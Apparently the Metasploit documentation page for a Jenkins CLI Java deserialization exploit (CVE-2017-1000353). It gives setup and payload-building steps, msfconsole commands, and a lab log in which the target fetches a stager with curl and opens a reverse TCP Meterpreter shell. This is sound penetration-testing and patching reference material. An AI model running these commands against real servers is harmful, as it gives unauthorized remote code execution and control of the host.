cgranleese-r7
3.8 KiB
Vulnerable Application
An unauthenticated Java object deserialization vulnerability exists
in the CLI component for Jenkins versions below v2.54.
The readFrom method within the Command class in the Jenkins
CLI remoting component deserializes objects received from clients without
first checking / sanitizing the data. Because of this, a malicious serialized
object contained within a serialized SignedObject can be sent to the Jenkins
endpoint to achieve code execution on the target.
Installation
Vulnerable versions of Jenkins can be downloaded from here. Additionally, a jdk will need to be installed on the target system.
To start Jenkins, navigate to the location of the downloaded war file and execute:
java -jar <jenkins-file>.war. To test if Jenkins is properly working, the CLI component
can be accessed by navigating to http://localhost:8080/cli.
How to Produce Binary Blob from PoC
Generating the serialized object first requires the Payload.java file
located in the data/exploits/CVE-2017-1000353/ folder.
- Obtain a vulnerable version of Jenkins
wget https://get.jenkins.io/war-stable/<version>/jenkins.war - Create a folder to extract the Jenkins files into
mkdir libs/ - Extract the contents of the war file into the newly created folder
cd libs/ && jar -xf ../jenkins.war - Assuming the
Payload.javafile is located in the same location asjenkins.war, compile the file, ensuring the Jenkins libraries are in the classpathcd ../ && javac -cp ".:./libs/WEB-INF/lib/*" Payload.java - To execute, supply the name of the outfile for the serialized object
and a placeholder command (Note. the command gets patched in the exploit module)
java -cp ".:./libs/WEB-INF/lib/*" Payload serial_obj.ser 'touch /tmp/test' - The serialized object will be located in the outfile you supplied in the previous step
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/jenkins_cli_deserialization - Do:
set RHOST <ip> - Do:
run - You should get a shell.
Options
No options
Scenarios
Jenkins v2.32.1 on Ubuntu Linux 18.04.1`
msf > use exploit/linux/http/jenkins_cli_deserialization
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/http/jenkins_cli_deserialization) > set rhost 192.168.37.149
rhost => 192.168.37.149
msf exploit(linux/http/jenkins_cli_deserialization) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf exploit(linux/http/jenkins_cli_deserialization) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Jenkins version 2.32.1 detected
[*] Sending payload...
[*] Using URL: http://0.0.0.0:8080/JMpXWoK
[*] Local IP: http://192.168.1.141:8080/JMpXWoK
[*] Client 192.168.37.149 (curl/7.58.0) requested /JMpXWoK
[*] Sending payload to 192.168.37.149 (curl/7.58.0)
[*] Command Stager progress - 50.46% done (55/109 bytes)
[*] Command Stager progress - 70.64% done (77/109 bytes)
[*] Command Stager progress - 82.57% done (90/109 bytes)
[*] Command Stager progress - 100.00% done (109/109 bytes)
[*] Sending stage (976712 bytes) to 192.168.37.149
[*] Meterpreter session 7 opened (192.168.37.1:4444 -> 192.168.37.149:44748) at 2020-09-10 18:01:34 -0500
[*] Server stopped.
meterpreter > getuid
Server username: space @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer : 192.168.37.149
OS : Ubuntu 18.04 (Linux 5.4.0-42-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux